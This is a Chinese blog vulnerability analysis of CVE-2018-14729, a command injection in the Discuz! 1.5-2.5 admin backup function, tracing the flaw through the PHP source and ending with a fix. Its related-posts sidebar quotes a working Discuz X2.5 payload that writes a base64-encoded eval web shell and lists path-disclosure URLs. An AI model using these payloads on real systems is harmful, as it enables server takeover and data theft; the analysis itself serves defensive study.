discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)

最新推荐文章于 2024-06-22 16:25:24 发布
最新推荐文章于 2024-06-22 16:25:24 发布
阅读量679 收藏
点赞数
文章标签: discuz discuz_admincp.php 讲解

158270

0x00 漏洞简述

漏洞信息

8月27号有人在GitHub上公布了有关Discuz 1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。

漏洞影响版本

Discuz! 1.5-2.5

0x01 漏洞复现

官方论坛下载相应版本就好。

0x02 漏洞分析

需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。

我这边是用Discuz! 2.5完成漏洞复现的,并用此进行漏洞分析的。

漏洞点在:

source/admincp/admincp_db.php

第296行:

@shell_exec($mysqlbin.'mysqldump --force --quick '.($db->version() > '4.1' ? '--skip-opt --create-options' : '-all').' --add-drop-table'.($_GET['extendins'] == 1 ? ' --extended-insert' : '').''.($db->version() > '4.1' && $_GET['sqlcompat'] == 'MYSQL40' ? ' --compatible=mysql40' : '').' --host="'.$dbhost.($dbport ? (is_numeric($dbport) ? ' --port='.$dbport : ' --socket="'.$dbport.'"') : '').'" --user="'.$dbuser.'" --password="'.$dbpw.'" "'.$dbname.'" '.$tablesstr.' > '.$dumpfile);

在shell_exec()函数中可控点在$tablesstr,向上看到第281行:

$tablesstr = '';

foreach($tables as $table) {

$tablesstr .= '"'.$table.'" ';

}

跟一下$table的获取流程,在上面的第143行:

if($_GET['type'] == 'discuz' || $_GET['type'] == 'discuz_uc')

{

$tables = arraykeys2(fetchtablelist($tablepre), 'Name');

}

elseif($_GET['type'] == 'custom')

{

$tables = array();

if(empty($_GET['setup']))

{

$tables = C::t('common_setting')->fetch('custombackup', true);

}

else

{

C::t('common_setting')->update('custombackup', empty($_GET['customtables'])? '' : $_GET['customtables']);

$tables = & $_GET['customtables'];

}

if( !is_array($tables) || empty($tables))

{

cpmsg('database_export_custom_invalid', '', 'error');

}

}

可以看到:

C::t('common_setting')->update('custombackup', empty($_GET['customtables'])? '' : $_GET['customtables']);

$tables = & $_GET['customtables'];

首先会从$_GET的数组中获取customtables字段的内容,判断内容是否为空,不为空则将从外部获取到的customtables字段内容写入common_setting表的skey=custombackup的svalue字段,写入过程中会将这个字段做序列化存储:

158270

之后再将该值赋给$tables。

至此可以看到漏洞产生的原因是由于shell_exec()中的$tablesstr可控,导致代码注入。

0x03 漏洞利用

漏洞的调用栈如下:

admin.php->source/class/discuz/discuz_admincp.php->source/admincp/admincp_db.php

跟着漏洞的调用栈看一下如何利用。

首先在admin.php中:

if(empty($action) || $frames != null) {

$admincp->show_admincp_main();

} elseif($action == 'logout') {

$admincp->do_admin_logout();

dheader("Location: ./index.php");

} elseif(in_array($action, $admincp_actions_normal) || ($admincp->isfounder && in_array($action, $admincp_actions_founder))) {

if($admincp->allow($action, $operation, $do) || $action == 'index') {

require $admincp->admincpfile($action);

} else {

cpheader();

cpmsg('action_noaccess', '', 'error');

}

} else {

cpheader();

cpmsg('action_noaccess', '', 'error');

}

关键点在构造参数满足require $admincp->admincpfile($action);且$action为db。也就说需要构造参数满足:

$admincp->isfounder && in_array($action, $admincp_actions_founder) # 为真

$admincp->allow($action, $operation, $do) # 为真

$admincp->isfounder是确认当前用户的,返回为True,这里只需要构造$action为db。

跟进require $admincp->admincpfile($action);:

function admincpfile($action) {

return './source/admincp/admincp_'.$action.'.php';

}

这里就包含了source/admincp/admincp_db.php。跟进看一下:

158270

这边需要满足$operation == ‘export’,同时存在exportsubmit字段。

之后,

158270

需要构造file字段,同时$_GET[‘type’] == ‘custom’且$_GET[‘setup’]和$_GET[‘customtables’]非空。向下跟,还需要满足最后一个条件$_GET[‘method’] != ‘multivol’,这样才能调用else中的操作,完成代码注入。

有了上面的这些基础分析,我们抓个符合上方条件的包来看一下。经过测试,

158270

158270

这样可以抓到符合我们条件的请求包。

158270

接下来只需要将customtables的内容更改一下就可以造成命令执行了:

158270

158270

效果为:

158270

0x04 参数获取问题

通过上面的分析可以看到最终可控参数的获取都是利用$_GET来获取的,但是我们在构造时发送的是post数据,那么为什么会照常获取到呢?

在admin.php第18行包含了source/class/class_core.php:跟进看一下:

...

C::creatapp();

class core

{

...

public static function creatapp() {

if(!is_object(self::$_app)) {

self::$_app = discuz_application::instance();

}

return self::$_app;

}

...

}

跟进到source/class/discuz/discuz_application.php中:

public function __construct() {

$this->_init_env();

$this->_init_config();

$this->_init_input();

$this->_init_output();

}

接着跟进到_init_input()中:

...

if($_SERVER['REQUEST_METHOD'] == 'POST' && !empty($_POST)) {

$_GET = array_merge($_GET, $_POST);

}

...

可以看到如果构造了post请求,Discuz的核心类会将$_GET和$_POST这两个list拼接到一起,赋给$_GET数组。

0x05 修复方法

可以利用addslashes()对可控点进行限制,同时利用escapeshellarg()函数来限制$tablesstr执行命令。

0x06 Discuz 3.4的做法

Discuz 3.4非常有趣的一点不是把这个漏洞修了,而是直接在source/admincp/admincp_db.php第307行写了一个错误…:

list(, $mysql_base) = DB::fetch($query, DB::$drivertype == 'mysqli' ? MYSQLI_NUM : MYSQL_NUM);

调用了一个未声明的静态变量,所以该功能直接是挂掉的,没有办法使用,可谓是简单粗暴…

0x07 参考资料

FoolMitAh/CVE-2018-14729

[1]  https://github.com/FoolMitAh/CVE-2018-14729

weixin_39740419
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
首页论坛热点自定义插件 for Discuz! 7.2 GBK.rar
07-14
templates\default\admincp.menu.lang.php templates\default\admincp.lang.php templates\default\admincp.msg.lang.php 2.把附件解压以后覆盖即可 使用说明: 1.进入后台 2.点击 ‘帖子’ 标签 3.会在左面...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
学习笔记-B/S - Exploits
人饭子的博客
11-02 2万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
20分钟攻破DISCUZ论坛并盗取数据库(web安全白帽子)
最新发布
qq_44870829的博客
06-22 1012
1 快速搭建discuz论坛 2 使用kali下burpsuite对discuz后台注入PHP木马 3 使用cknife “菜刀” 上传webshell 木马到网站 4 使用webshell查看mysql数据库密码并盗取数据库
admincp db.php,Discuz!后台程序目录/source/admincp/下目录及文件功能详解
weixin_35158372的博客
03-20 588
不管是做网站运营还是做discuz二次开发都需要对discuz后台程序有一定的了解,本文就向大家介绍其后台程序目录/source/admincp/目录下目录及文件功能:/source/admincp/后台管理 /source/admincp/cloud/云平台项目 /source/admincp/menu/后台扩展菜单目录 /source/admincp/moderate/审核数据项目 /s...
admincp setting.php,disncuzX3.2关闭注册邮箱必填选项
weixin_36410277的博客
04-01 265
大家好,今天无忧小编(www.51php.com)和大家又见面了,最近有看到有站長想去掉discuz注册时候的邮箱必填选项,在无忧主机购买php虚拟主机时,注册用户邮箱也是必填项哦。本来这个在x3.0 和 x3.1 版本時後台可以設置的,但 x3.2 版本後台又取消這個功能設置了。不过既然有需求恢复这个功能,那么无忧小编(www.51php.com)就把教程贴出来给大家:1、第一步source/a...
admincp.php,安装好找不到后台文件admincp.php
weixin_42463199的博客
03-12 133
/*[Discuz!] (C)2001-2007 Comsenz Inc.This is NOT a freeware, use is subject to license terms$RCSfile: admincp.php,v $$Revision: 1.112.2.1 $$Date: 2007/07/24 17:50:15 $*/define('IN_ADMINCP', TRUE);defi...
Discuz! X2.5 远程代码执行漏洞及EXP
weixin_30363817的博客
08-03 312
利用方法: 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论坛根目录下生成demo.php,一句发密码C 转载于:https...
Discuz!_X2.5_数据字典.docx
12-03
Discuz! X2.5 数据字典详解》 Discuz! X2.5 是一款广泛应用的论坛管理系统,它的数据字典提供了对数据库中各表结构的详细描述,便于开发者和管理员理解和操作论坛数据。本篇文章将深入解析 Discuz! X2.5 的主要...
论坛FTP——BBSFTP插件 for Discuz!7.0 GBK.rar
07-14
本插件使用环境 (1,论坛,和FTP服务器都是windows 就只要有一台服务器就够了  2,论坛是linux,那么...其中ServU端插件,把目录里的文件复制到SERVU目录(就是你的FTP服务器,执行bbsftpconfig.exe,按照提示操作)
在线文件管理插件 for Discuz!7.2 GBK.rar
07-14
功能很简单,允许管理员在后台直接对论坛文件进行修改。 安装方法: 请把editprogram.inc.php上传到admin目录中,把...名称为“编辑文件”,URL为“http://www.yoursite.com/admincp.php?action=editprogram”
Discuz!_X2.5_数据字典
06-08
Discuz! X2.5 数据字典详解 Discuz! X2.5 数据字典是一个用于Discuz! 论坛系统的数据存储和管理的数据库结构。该数据库结构包含多个表,每个表都有其特定的字段和数据类型,用于存储不同的数据。 pre_common_...
Discuz! X2.5 最新GetShell0day 详细利用
weixin_33970449的博客
12-07 683
Discuz! X2.5 最新GetShell0day 详细利用听说Discuz!这次又出漏洞了,这次还是个GetShell漏洞呀。这个漏洞比较新,应该很多站还没更新吧。影响版本有:20120407,beta,rcDiscuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号,在实现上存在远程命令执行漏洞,远程***者可利用此漏...
Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
oceanark的博客
07-13 2659
----------- 首先膜拜大牛的共享精神,我淫比较懒试了几个站都没成功就不弄了,但有人说成功了,不知道是PR问题还是补丁了   正文:前面省略一万+字。。。。 利用方法 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),
DZ(discuz) x2.5 爆路径漏洞
收集盒 Book box
11-20 2620
/* just for search DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5 */ 白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具 果断秒杀之 发出来共享之 爆路径文件如下: /uc_server/control/admin/db.php /source/plug
dz 论坛x2.5爆路径 利用
l460602540的专栏
09-12 1569
http://blog.sina.com.cn/s/blog_4ab77dfb01015xro.html 注:转载请注明出处 Lind0ws 's Blog    http://localhost/uc_server/control/admin/db.php    http://localhost/source/plugin/myrepeats/table/table_myr
discuz discuz_admincp.php 讲解,admincp
weixin_34803738的博客
03-19 299
ReDiscuz3.2云储存插件用的是ace 写入yaml后不成功,怎么办?是不是还要解析域名?-------------------------ReDiscuz3.2云储存插件替换class_core文件后出现错误Discuz! System ErrorCloud file not exists!PHP Debug[table=100%,#aaaaaa,,1][tr=rgb(238, 238, ...
Discuz!后台程序目录/source/admincp/下目录及文件功能详解
土著人宁巴的Discuz!专栏
04-02 8499
不管是做网站运营还是做discuz二次开发都需要对discuz后台程序有一定的了解,本文就向大家介绍其后台程序目录/source/admincp/目录下目录及文件功能: /source/admincp/后台管理 /source/admincp/cloud/云平台项目 /source/admincp/menu/后台扩展菜单目录 /source/admincp/moderate/审核数
Discuz2.5-3.4任意文件删除漏洞分析
老北京砸酱锤的博客
06-22 598
Discuz!X ≤3.4 任意文件删除漏洞 Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。 2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。 修复建议 升级到最新版本的 Discuz! 实验环境 操作机:centos7 目标地址:192.168.0.105 Discuz版本:3.1 实验步骤 步骤1:了解原理 该漏洞于2014年6.
discuz config_global.php,Discuz! X config_global.php配置注释教程
05-24
以下是Discuz! X的config_global.php配置文件的注释教程: ```php <?php /** * Discuz! X - 配置文件 * * 版权所有 (C) 2001-2019 Comsenz Inc. * This is NOT a freeware, use is subject to license terms * * $Id: config_global.php 36360 2019-11-18 00:28:51Z nemohou $ */ // ---------------------------- CONFIG DB ----------------------------- // /** * 数据库设置 * * type 数据库类型,可选值为 mysql 或 mysqli * server 数据库服务器 * port 数据库端口 * username 数据库用户名 * password 数据库密码 * dbname 数据库名 * pconnect 是否启用持久连接 * charset 数据库字符集,可选值为 gbk, big5, utf8, latin1, etc. * setnames 是否将字符集强制设为 utf8 * tablepre 表名前缀 * dbdebug 是否启用数据库调试模式 */ $_config['db']['1']['dbtype'] = 'mysql'; $_config['db']['1']['dbhost'] = 'localhost'; $_config['db']['1']['dbport'] = '3306'; $_config['db']['1']['dbuser'] = 'root'; $_config['db']['1']['dbpw'] = 'password'; $_config['db']['1']['dbname'] = 'discuz'; $_config['db']['1']['pconnect'] = '0'; $_config['db']['1']['charset'] = 'utf8'; $_config['db']['1']['setnames'] = '1'; $_config['db']['1']['tablepre'] = 'pre_'; $_config['db']['1']['dbdebug'] = 'false'; // -------------------------- CONFIG MEMORY --------------------------- // /** * 内存变量缓存设置 * * type 缓存类型,可选值为 filecache 或 memcache 或 apc * ttl 缓存失效时间,单位为秒 * prefix 缓存前缀,建议修改,避免同服务器中的程序引起冲突 * servers memcache 缓存服务器地址和端口,可指定多个,格式为数组 */ $_config['memory']['prefix'] = 'discuz_'; $_config['memory']['eaccelerator'] = false; $_config['memory']['apc'] = false; $_config['memory']['xcache'] = false; $_config['memory']['file']['server'] = array(); $_config['memory']['memcache']['server'] = array( array('127.0.0.1', 11211, 1), // 第一个参数为 memcache 服务器的地址,第二个参数为端口,第三个参数为权重,用于负载均衡,默认为1 ); // ----------------------------- CONFIG CACHE --------------------------- // /** * 数据缓存设置 * * type 缓存类型,可选值为 filecache 或 memcache 或 apc * ttl 缓存失效时间,单位为秒 * prefix 缓存前缀,建议修改,避免同服务器中的程序引起冲突 * filecache 设置缓存的目录,仅对 filecache 缓存有效 * servers memcache 缓存服务器地址和端口,可指定多个,格式为数组 * compress 是否启用 memcache 的压缩功能 */ $_config['cache']['type'] = 'filecache'; $_config['cache']['file']['server'] = array( array('localhost', 11211, 1), ); $_config['cache']['memcache']['server'] = array( array('localhost', 11211, 1), ); $_config['cache']['apc'] = false; $_config['cache']['ttl'] = 0; $_config['cache']['prefix'] = 'discuz_'; $_config['cache']['file']['dir'] = './data/cache/'; $_config['cache']['memcache']['compress'] = false; // ----------------------------- CONFIG SMTP --------------------------- // /** * 邮件设置 * * maildefault 默认的邮件发送方式,可选值为 smtp 或 sendmail * smtp 以下 SMTP 设置仅在 maildefault 为 smtp 时有效 * server SMTP 服务器地址 * port SMTP 服务器端口 * auth 是否启用 SMTP 认证,可选值为 true 或 false * username SMTP 服务器用户名 * password SMTP 服务器密码 * sendmail 以下 Sendmail 设置仅在 maildefault 为 sendmail 时有效 * server Sendmail 服务器地址 * sendmail_path Sendmail 程序路径 * * 注意:不同的邮件发送方式对应的设置选项不同,具体请参见官方文档 */ $_config['mail']['maildefault'] = 'smtp'; $_config['mail']['smtp']['server'] = 'smtp.exmail.qq.com'; $_config['mail']['smtp']['port'] = '25'; $_config['mail']['smtp']['auth'] = '1'; $_config['mail']['smtp']['username'] = 'admin@example.com'; $_config['mail']['smtp']['password'] = 'password'; $_config['mail']['sendmail']['server'] = '/usr/sbin/sendmail'; $_config['mail']['sendmail']['sendmail_path'] = ''; // ----------------------------- CONFIG SECURITY --------------------------- // /** * 安全设置 * * authkey 论坛加密密钥,建议修改,长度为 64 个字符 * cookiepre cookie 前缀,建议修改,避免同服务器中的程序引起冲突 * cachelist 缓存前缀列表,建议修改,避免同服务器中的程序引起冲突 * attackevasive 是否启用防抵制攻击功能,可选值为 0、1、2、3 或 4 * 0 表示关闭防抵制攻击功能 * 1 表示启用 cookie 刷新方式防抵制攻击功能 * 2 表示启用限制代理访问功能防抵制攻击功能 * 3 表示启用 cookie 刷新与限制代理访问两种方式的防抵制攻击功能 * 4 表示启用加强版防抵制攻击功能 * 注意:启用加强版防抵制攻击功能后,可能会影响网站的访问速度 * admincp_allow_ip 允许访问后台的 IP 地址列表,多个 IP 之间用英文逗号隔开 * admincp_check_ip 是否启用后台 IP 验证功能,可选值为 0 或 1 * admincp_cpsession 是否启用后台 session 验证功能,可选值为 0 或 1 */ $_config['security']['authkey'] = '1234567890123456789012345678901234567890123456789012345678901234'; $_config['security']['cookiepre'] = 'discuz_'; $_config['security']['cachelist'] = ''; $_config['security']['attackevasive'] = '0'; $_config['security']['admincp_allow_ip'] = ''; $_config['security']['admincp_check_ip'] = '1'; $_config['security']['admincp_cpsession'] = '1'; // ----------------------------- CONFIG SYSTEM --------------------------- // /** * 系统设置 * * debug 是否启用调试模式,可选值为 true 或 false * cookie_domain cookie 作用域 * cookie_path cookie 作用路径 * attachdir 附件上传目录,相对于论坛根目录的路径 * attachurl 附件 URL 地址 * attachimgpost 是否允许在帖子中显示图片附件,可选值为 0 或 1 * attachrefcheck 是否检查附件引用,可选值为 0 或 1 * attachsave 是否在服务器上保存上传的附件,可选值为 0 或 1 * attachimgmaxsize 图片类附件上传大小,单位为字节 * attachimgthumb 是否生成缩略图,可选值为 0 或 1 * attachimgquality 缩略图质量,取值范围为 1-100 * attachimgwatermark 是否添加水印,可选值为 0 或 1 * attachimgwatermarktype 水印类型,可选值为 text、image 或 none * attachimgwatermarktext 水印文字,当水印类型为 text 时有效 * attachimgwatermarktrans 水印透明度,取值范围为 1-100,当水印类型为 text 时有效 * attachimgwatermarkfile 水印图片文件名,当水印类型为 image 时有效 * attachimgwatermarkpos 水印位置,可选值为 1-9,当水印类型为 image 时有效 * refererhotlink 是否开启防盗链功能,可选值为 0 或 1 * hotlink_protect_key 防盗链密钥,如果不设置,则系统自动生成一个密钥 */ $_config['debug'] = false; $_config['cookie']['cookie_domain'] = ''; $_config['cookie']['cookie_path'] = '/'; $_config['attachdir'] = './data/attachment'; $_config['attachurl'] = 'attachment/'; $_config['attachimgpost'] = '1'; $_config['attachrefcheck'] = '1'; $_config['attachsave'] = '1'; $_config['attachimgmaxsize'] = '2048000'; $_config['attachimgthumb'] = '1'; $_config['attachimgquality'] = '80'; $_config['attachimgwatermark'] = '1'; $_config['attachimgwatermarktype'] = 'text'; $_config['attachimgwatermarktext'] = 'Discuz!'; $_config['attachimgwatermarktrans'] = '50'; $_config['attachimgwatermarkfile'] = ''; $_config['attachimgwatermarkpos'] = '9'; $_config['refererhotlink'] = '0'; $_config['hotlink_protect_key'] = ''; // ----------------------------- CONFIG OUTPUT --------------------------- // /** * 输出设置 * * output_gzip 是否启用 Gzip 压缩输出,可选值为 0 或 1 * output_charset 输出页面字符集,可选值为 gb2312、gbk、big5、utf-8 或 iso-8859-1 * output_language 输出页面语言,可选值为 en、zh-cn、zh-tw * output_encoding 输出页面编码格式,可选值为 xml、html、xhtml */ $_config['output']['gzip'] = '0'; $_config['output']['charset'] = 'utf-8'; $_config['output']['language'] = 'zh-cn'; $_config['output']['encoding'] = 'html'; ``` 以上就是Discuz! X的config_global.php配置文件的注释教程,希望能够帮助到你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值